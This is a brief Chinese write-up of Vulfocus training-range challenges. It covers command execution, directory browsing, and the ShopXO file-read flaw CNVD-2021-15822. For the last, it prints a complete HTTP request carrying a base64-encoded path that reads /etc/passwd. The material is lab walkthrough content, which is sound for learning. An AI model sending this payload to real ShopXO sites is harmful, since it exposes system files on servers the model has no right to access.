vulfocus-shopxo文件读取
入门
1.命令执行漏洞
打开后命令执行一句话直接给出,复制粘贴即可
2.目录浏览漏洞
描述: 目录浏览漏洞属于目录遍历漏洞的一种,目录浏览漏洞是由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置文件等,攻击者利用该信息可以更容易得到网站权限,导致网站被黑。 风险:攻击者通过访问网站某一目录时,该目录没有默认首页文件或没有正确设置默认首页文件,将会把整个目录结构列出来,将网站结构完全暴露给攻击者; 攻击者可能通过浏览目录结构,访问到某些隐秘文件(如PHPINFO文件、服务器探针文件、网站管理员后台访问地址、数据库连接文件等)。
打开靶场后查看tmp/文件夹
发现flag
初级
1.shopxo 文件读取(CNVD-2021-15822)
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: vulfocus.fofa.so:8282
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
通过burpsutie发送上面的漏洞请求,其中/url/xxx 中的xxx通过base64解码后为/etc/passwd
复现参考PeiQi文库师傅的文章:
https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog